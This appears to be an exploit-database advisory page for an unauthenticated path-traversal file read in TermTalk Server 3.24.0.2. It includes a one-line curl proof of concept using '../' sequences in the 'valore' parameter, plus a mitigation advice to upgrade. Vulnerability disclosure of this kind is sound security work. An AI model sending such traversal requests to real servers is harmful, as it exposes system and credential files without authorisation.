header-logo
Suggest Exploit
vendor:
TermTalk Server
by:
Fabiano Golluscio
8.8
CVSS
HIGH
Arbitrary File Read
22
CWE
Product Name: TermTalk Server
Affected Version From: 3.24.0.2
Affected Version To: 3.26.1.7
Patch Exists: YES
Related CWE:
CPE: a:solari_di_udine:termtalk_server
Metasploit:
Other Scripts:
Platforms Tested:
2022

TermTalk Server 3.24.0.2 – Arbitrary File Read (Unauthenticated)

TermTalk Server 3.24.0.2 is vulnerable to an unauthenticated arbitrary file read. An attacker can send a specially crafted HTTP request to the server to read any file on the system. This can be done by sending a request to the ‘/file’ endpoint with the ‘valore’ parameter set to the path of the file to be read. For example, sending a request to ‘/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts’ will return the contents of the ‘hosts’ file.

Mitigation:

Upgrade to TermTalk Server 3.26.1.7 or later.
Source

Exploit-DB raw data:

# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/

POC

curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts

Navigation

Suggest Exploit

Services By CQR